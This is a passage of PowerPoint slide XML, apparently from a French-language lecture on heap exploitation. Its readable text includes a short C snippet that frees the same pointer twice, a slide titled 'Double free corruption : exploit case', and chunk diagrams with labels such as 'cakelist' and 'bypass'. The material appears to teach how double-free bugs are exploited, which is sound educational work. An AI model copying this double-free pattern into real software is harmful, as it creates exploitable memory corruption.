          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1860156" y="4251908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 : 0x10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766AEAC-8F2E-471D-BD5A-3FA50D7E9562}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1860156" y="4715314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: 0x20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289C43B-1E24-4A66-8FEA-2FB177529FA7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1895652" y="5216612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B09696-3A45-4419-9039-6D625FFDF666}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6236543" y="5618580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790BBB8C-5BE8-49BC-B642-BD923E41BDBD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="9" idx="3"/>
            <a:endCxn id="16" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4668468" y="4899980"/>
            <a:ext cx="1172031" cy="1151388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4804359-0C9D-4303-87DF-4F08A0624E3D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6632587" y="5618580"/>
            <a:ext cx="3876572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4188BB-C493-4BD0-8247-252189E75333}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5840499" y="5618580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C60C1E4-E095-4A68-8CDE-9369D91B77A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5840499" y="6628172"/>
            <a:ext cx="46686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1176D44-B56F-427F-9133-286202AF6EFC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6230664" y="3993459"/>
            <a:ext cx="396044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B728AF-3EFC-4256-8772-E445A83FD1E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6632587" y="3993459"/>
            <a:ext cx="1400001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9FBDE9-0360-462B-A155-317171317B6F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5834620" y="3993459"/>
            <a:ext cx="396044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20E07252-CE69-46D3-83CC-DDE2F407B8B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5833926" y="4989561"/>
            <a:ext cx="2196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E75D4B00-0C23-4F56-ABE6-2B94123A5AE4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6570107" y="500561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0x10</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="4" name="Connecteur : en angle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51CA778A-F7EF-44CA-B078-25C8AB4EDAF7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="8" idx="3"/>
            <a:endCxn id="33" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4668468" y="3993459"/>
            <a:ext cx="4176826" cy="474473"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector4">
            <a:avLst>
              <a:gd name="adj1" fmla="val 12884"/>
              <a:gd name="adj2" fmla="val 271944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116E8E0-68E7-48B3-B031-9C9CC0268D3B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9043316" y="3993459"/>
            <a:ext cx="396044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5400EE9-BEAF-4629-AAE1-5E3EEA866025}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9445239" y="3993459"/>
            <a:ext cx="1400001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F3F060-DC75-4479-BFB9-6FB9EC47698D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8647272" y="3993459"/>
            <a:ext cx="396044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06805D26-3224-4131-BF5A-6570B0ED5D76}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8646578" y="4989561"/>
            <a:ext cx="2196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FCCAAE68-4693-4ED6-B696-08C2FFAE6022}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9382759" y="500561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0x10</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="36" name="Connecteur : en angle 35">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4613BC87-27E4-4A52-8947-A02D9773FFC0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="31" idx="0"/>
            <a:endCxn id="28" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1" flipV="1">
            <a:off x="7321585" y="2506494"/>
            <a:ext cx="432788" cy="3406718"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector4">
            <a:avLst>
              <a:gd name="adj1" fmla="val -120663"/>
              <a:gd name="adj2" fmla="val 10671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lèche : chevron 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77CD8665-6940-4E03-B744-229F5D6A513D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8" name="Flèche : chevron 37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3274D097-6998-4892-905D-FA003344ABF8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39" name="Flèche : chevron 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE94E8A2-6B09-49D7-8FD2-C92D13F63A05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0" name="Flèche : chevron 39">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F2DE9BCE-1867-44E8-8CD1-347374F479DE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1" name="Flèche : chevron 40">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9FB1A23B-A21F-4211-92CF-FE7ED16C288F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42" name="Flèche : chevron 41">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C577FA6-AF94-4021-8F5A-B5E507F0941A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11971941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D805B5-0A33-456D-AEB1-F046C1F4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 : bypass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B64D488-DA24-4045-90D0-05F4F880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799"/>
            <a:ext cx="9144000" cy="3263091"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>char* a = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>malloc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>(4);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>char* b = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>malloc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>(4);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>free(a);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>free(b);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>free(a);</a:t>
            </a:r>
          </a:p>
          <a:p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512463-87D4-49DA-A05F-6A6AD5995464}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2868268" y="4251908"/>
            <a:ext cx="18002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2F6A59-7BED-4457-9C90-B11EF416F5CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2868268" y="4683956"/>
            <a:ext cx="18002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E0F6EB0-DAB3-42EF-9979-12CF38B6C589}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1860156" y="4251908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 : 0x10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766AEAC-8F2E-471D-BD5A-3FA50D7E9562}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1860156" y="4715314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: 0x20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289C43B-1E24-4A66-8FEA-2FB177529FA7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1895652" y="5216612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B09696-3A45-4419-9039-6D625FFDF666}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6236543" y="5618580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790BBB8C-5BE8-49BC-B642-BD923E41BDBD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="9" idx="3"/>
            <a:endCxn id="16" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4668468" y="4899980"/>
            <a:ext cx="1172031" cy="1151388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4804359-0C9D-4303-87DF-4F08A0624E3D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6632587" y="5618580"/>
            <a:ext cx="3876572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4188BB-C493-4BD0-8247-252189E75333}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5840499" y="5618580"/>
            <a:ext cx="396044" cy="8655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C60C1E4-E095-4A68-8CDE-9369D91B77A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5840499" y="6628172"/>
            <a:ext cx="46686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1176D44-B56F-427F-9133-286202AF6EFC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6230664" y="3993459"/>
            <a:ext cx="396044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B728AF-3EFC-4256-8772-E445A83FD1E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6632587" y="3993459"/>
            <a:ext cx="1400001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9FBDE9-0360-462B-A155-317171317B6F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5834620" y="3993459"/>
            <a:ext cx="396044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20E07252-CE69-46D3-83CC-DDE2F407B8B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5833926" y="4989561"/>
            <a:ext cx="2196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E75D4B00-0C23-4F56-ABE6-2B94123A5AE4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6570107" y="500561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0x10</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="4" name="Connecteur : en angle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51CA778A-F7EF-44CA-B078-25C8AB4EDAF7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4668468" y="4467932"/>
            <a:ext cx="1165458" cy="216024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116E8E0-68E7-48B3-B031-9C9CC0268D3B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9043316" y="3993459"/>
            <a:ext cx="396044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5400EE9-BEAF-4629-AAE1-5E3EEA866025}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9445239" y="3993459"/>
            <a:ext cx="1400001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F3F060-DC75-4479-BFB9-6FB9EC47698D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8647272" y="3993459"/>
            <a:ext cx="396044" cy="865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header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06805D26-3224-4131-BF5A-6570B0ED5D76}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8646578" y="4989561"/>
            <a:ext cx="2196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FCCAAE68-4693-4ED6-B696-08C2FFAE6022}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9382759" y="500561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0x10</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="36" name="Connecteur : en angle 35">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4613BC87-27E4-4A52-8947-A02D9773FFC0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="31" idx="0"/>
            <a:endCxn id="28" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1" flipV="1">
            <a:off x="7321585" y="2506494"/>
            <a:ext cx="432788" cy="3406718"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector4">
            <a:avLst>
              <a:gd name="adj1" fmla="val -120663"/>
              <a:gd name="adj2" fmla="val 10671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 : en angle 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1B28BDD2-C5B0-41A1-B844-70832E107867}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="26" idx="0"/>
            <a:endCxn id="33" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="7636990" y="2785155"/>
            <a:ext cx="12700" cy="2416608"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 180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lèche : chevron 37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E446434-777A-495D-8466-F1EB90B4F180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9" name="Flèche : chevron 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{98D177E1-DF48-4D7A-904A-B30BA164961C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40" name="Flèche : chevron 39">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{419B0480-E818-4E2C-90B0-F5FD8B8F6FA1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1" name="Flèche : chevron 40">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E4CDD7F-AD46-4F77-AEB0-9A20314D6118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2" name="Flèche : chevron 41">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D69AB39C-DB8A-420A-BBD7-7AA5CDC25D55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43" name="Flèche : chevron 42">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05C61033-FB78-44D7-9470-DC6DA2218140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4215169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051259-698B-4C9D-B958-E7F41D840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/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Double free corruption : exploit case</a:t>
            </a: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A34A0E96-4A4E-4C38-8AE3-EB1B734C0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560399"/>
            <a:ext cx="2232248" cy="4929075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39957026-AEE9-484A-AE02-5A3534E8C071}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8184232" y="3894608"/>
            <a:ext cx="499537" cy="8640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10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C89FF54-AEDE-4EC1-B265-64D53B2D2AEE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8683769" y="3894608"/>
            <a:ext cx="1468800" cy="8640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 err="1"/>
              <a:t>thegame</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/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A6409C9F-EF25-4EEB-95C5-DCECB0255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806" y="1600199"/>
            <a:ext cx="5042262" cy="1795233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BA35C280-D07C-4A4A-87F3-343E898C3296}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6771156" y="5363368"/>
            <a:ext cx="1008112" cy="3600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468BE00-B71E-4977-8E58-62E484C43222}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7779268" y="5363368"/>
            <a:ext cx="1008112" cy="3600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NULL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4B3DCF4-C225-4118-98FD-54177E2E1C6D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8787380" y="5363368"/>
            <a:ext cx="1008112" cy="3600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NULL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4608AD8-661F-45B0-A299-C31B9948703B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9795492" y="5363368"/>
            <a:ext cx="1008112" cy="3600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…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="70" name="Connecteur : en angle 69">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A8EE800-AC2A-49C9-8165-58C23B02A6CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="65" idx="0"/>
            <a:endCxn id="59" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="7211366" y="4390502"/>
            <a:ext cx="1036712" cy="909020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ZoneTexte 70">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F76CEE53-78B5-4ED0-AAF9-C1F0672C8961}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6771156" y="579541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0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6892340E-F3E1-4730-A2E2-163F83D84B5E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7778484" y="579541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7D1A3E85-AB8C-4026-8194-D9E326A3D2D4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8787380" y="579541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D1359177-863B-4A8A-BD60-9B16A3AD7998}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5682790" y="535407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cakelist</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/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272C3DCF-FAF2-4551-9327-AF6035B06C04}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8687113" y="3779192"/>
            <a:ext cx="146545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DD3B617D-7942-40DC-A22F-43B285BEAB06}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8184232" y="4862544"/>
            <a:ext cx="49953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ZoneTexte 79">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E120134-F74C-4828-8DF9-305014A657D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8105746" y="4849753"/>
            <a:ext cx="68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price</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/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0AF218A4-8BF9-4D4D-BB17-5AD5FC1395D9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9003404" y="3395437"/>
            <a:ext cx="146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name</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Flèche : chevron 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9CCCE70-3BE1-4D2B-A40B-28A4572DE0B8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1" name="Flèche : chevron 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A728715-6DC7-474E-A39C-708A25DB5578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22" name="Flèche : chevron 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC297FAE-A017-446D-8337-6FDCFDD59A7F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" name="Flèche : chevron 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{026C6ED5-040A-4750-A3B9-DEA7EB31C959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4" name="Flèche : chevron 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{06965FA3-7C7B-4F71-BB91-87F7EF8FC586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25" name="Flèche : chevron 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F297B72-8910-423D-AD1D-956499BE985D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28544518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50821-CAA8-4ED2-9FBC-C1510E9F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0DD3F0-518E-4041-94E6-924EDD280CD4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3892800" y="2414072"/>
            <a:ext cx="14688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cake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41F6C2-072F-4E44-A2FA-575EDA7DADE4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5361600" y="2414072"/>
            <a:ext cx="14688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cake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C84CD7-88B9-4EB4-941F-9D6DDA1BBA98}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1631504" y="2418616"/>
            <a:ext cx="14688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5339E4-E5BC-4282-8C52-6314DC5EB8EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1631504" y="2850664"/>
